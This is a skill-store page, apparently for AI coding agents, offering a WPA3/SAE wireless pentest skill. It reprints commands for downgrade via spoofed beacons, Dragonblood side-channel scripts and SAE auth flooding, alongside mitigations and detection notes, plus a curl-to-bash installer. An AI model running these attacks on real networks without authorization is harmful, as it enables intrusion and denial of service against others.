‹ 首页

offensive-wpa3-sae

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

WPA3 / SAE (Simultaneous Authentication of Equals) attack methodology — transition-mode (mixed WPA2/WPA3) downgrade, Dragonblood side-channel attacks (CVE-2019-9494, 9495, 13377, 13456), SAE auth flooding for AP CPU exhaustion, Hash-to-Element (H2E) timing analysis, group downgrade, and 6 GHz / Wi-Fi 6E spec implications (PMF mandatory, no transition mode allowed). Use when target advertises WPA3-SAE or WPA3-Personal/Enterprise, or operates in 6 GHz where WPA3 + PMF are required by spec.

适合你,如果需要对WPA3网络进行安全评估或渗透测试

/ 下载安装
offensive-wpa3-sae.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-wpa3-sae
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-wpa3-sae
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-wpa3-sae
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~1.4K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准
它做什么

装上后,Claude 会指导你针对 WPA3/SAE 网络进行攻击:包括过渡模式降级到 WPA2、Dragonblood 侧信道攻击、SAE 认证洪水攻击等。

什么时候触发

当目标网络广告 WPA3-SAE 或 WPA3-Personal/Enterprise,或在 6 GHz 频段运行时触发。

装好后可以这样说
Claude 会给出降级到 WPA2 的步骤。
Claude 会指导使用 dragontime 等脚本。
Claude 会提供 mdk4 命令。
技能原文 SKILL.md作者撰写 · MIT · aeb41ec

WPA3 / SAE Attacks

WPA3 fixes the offline-handshake-cracking weakness of WPA2 by replacing the 4-way PSK exchange with SAE (a Dragonfly-derived password-authenticated key exchange). The straightforward offline crack disappears — but transition-mode misconfigurations and the original SAE implementation's side-channel leaks open new paths.

Quick Workflow
  1. Verify the target advertises WPA3 (RSN IE shows AKM SAE = 8)
  2. Check for transition-mode (mixed WPA2 + WPA3) — easiest path
  3. If pure WPA3, fingerprint the AP's hostapd version for Dragonblood applicability
  4. Side-channel timing or cache attacks if reachable
  5. Otherwise, accept that offline cracking isn't viable — pivot to other surfaces

Transition-Mode Downgrade

If the AP advertises both WPA2-PSK and WPA3-SAE (transition mode for mixed-client networks), older clients can be forced onto WPA2:

# Identify transition mode in beacon frames
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
# Encryption column shows WPA2 WPA3 (both)

Steps:

  1. Spoof a beacon advertising only RSN-WPA2 with the same BSSID/SSID
  2. Client roams to your beacon, performs WPA2 4-way handshake
  3. Capture handshake exactly like offensive-wpa2-psk
# Use hostapd-mana or airbase-ng for the WPA2-only AP advertisement
airbase-ng -e CorpWiFi -c 6 -W 1 wlan0mon
# -W 1 enables WPA, configure for WPA2-only RSN element

Why this works: WPA3-SAE clients fall back to WPA2-PSK if the AP only advertises WPA2 — there's no protected downgrade defense in transition mode. WPA3-only mode (no transition) blocks this.

Mitigation defenders use: WPA3-only networks (no WPA2). Wi-Fi 6E (6 GHz) mandates WPA3-only by spec.

Dragonblood (CVE-2019-9494 / 9495 / 13377 / 13456)

Side-channel and downgrade attacks against the SAE Hunting-and-Pecking algorithm in pre-2.10 hostapd / wpa_supplicant.

Cache-Based Side-Channel

The original SAE password-element derivation iterates a variable number of times depending on the password and MAC. Cache hits leak the iteration count.

git clone https://github.com/vanhoefm/dragonblood
cd dragonblood

# Cache-based attack (requires co-located malicious code on target host — limited)
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
Timing Side-Channel

The same iteration count leaks via observable timing of the SAE commit phase from outside.

python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon --mode timing
Downgrade to Weak Group

Some implementations accept SAE with the deprecated MODP group 5 if the client requests it. Combined with cache/timing side channels, this enables offline dictionary attack.

python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
Patched Versions

| Implementation | Fixed | |---|---| | hostapd / wpa_supplicant | 2.10 (April 2022) | | Apple iOS / macOS | 2019 patches | | Windows | KB-batched 2019-2020 | | Embedded routers | Often unpatched — high hit rate on consumer SOHO |

Hash-to-Element (H2E)

WPA3 R2 introduced H2E to replace the iteration-leaky Hunting-and-Pecking. H2E is constant-time. If the AP advertises H2E in the RSNXE element, Dragonblood-class attacks don't apply.

# Wireshark filter
wlan.rsnx.field.h2e

If H2E is present and required (no Hunting-and-Pecking fallback), only the spec is left to attack — abandon SAE attacks and pivot to other surfaces (PMF check, evil-twin via EAP if Enterprise, supply-chain via management frames).

SAE Auth Flooding (DoS)

SAE's commit phase requires the AP to do heavy elliptic-curve work per association attempt. Floods can exhaust CPU on lower-end APs, denying service to legitimate clients.

sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Auth attack mode -a, multiple per second -s 1024

This is a DoS — only with explicit authorization. Modern enterprise APs use anti-clogging tokens to throttle SAE-flood attacks; consumer routers often don't.

6 GHz / Wi-Fi 6E Implications

The 6 GHz band (Wi-Fi 6E, channels 1–233 in the 5925–7125 MHz range) requires:

  • WPA3-only (no transition mode)
  • PMF (802.11w) mandatory (deauth/disassoc protected)
  • OWE (Opportunistic Wireless Encryption) for open networks

Net effect: most pre-WPA3 attacks (deauth, transition-mode downgrade) don't apply on 6 GHz. Pure SAE side-channel, evil-twin, or out-of-band attacks remain viable.

Detection Considerations

WPA3 is enterprise-defended much like WPA2 — WIDS catches:

  • Beacon spoofing (transition-mode downgrade) via fingerprint mismatch (IE order, vendor-specific, beacon timing)
  • SAE flood via association rate per source MAC
  • Repeated SAE commit failures (timing attack telemetry)

Successful Dragonblood-class attacks against patched modern hostapd are unlikely. Consumer SOHO and embedded APs are still in scope.

Engagement Cheatsheet
# 1. Identify mode
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
# Encryption: WPA2 + WPA3 → transition; WPA3-only → SAE-only

# 2. Transition-mode downgrade attempt
sudo airbase-ng -e <ESSID> -c <ch> -W 1 -z 4 wlan0mon  # WPA2-RSN advertised only

# 3. Wait for client roam, capture WPA2 handshake (handoff to offensive-wpa2-psk)

# 4. If pure WPA3, fingerprint hostapd
# (passive analysis of beacon IE order + version-specific behaviors)

# 5. Run Dragonblood test scripts if pre-2.10 hostapd suspected
python3 dragondrain.py wlan0mon <BSSID>
python3 dragontime.py --bssid <BSSID> --iface wlan0mon

# 6. Document residual viable attacks; pivot to evil-twin / EAP / RF if pure WPA3 R2

Key References
  • Dragonblood: dragonblood.net (Vanhoef + Ronen)
  • IEEE 802.11-2020 (combined spec including WPA3)
  • WFA WPA3 Specification
  • hostapd 2.10 release notes
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。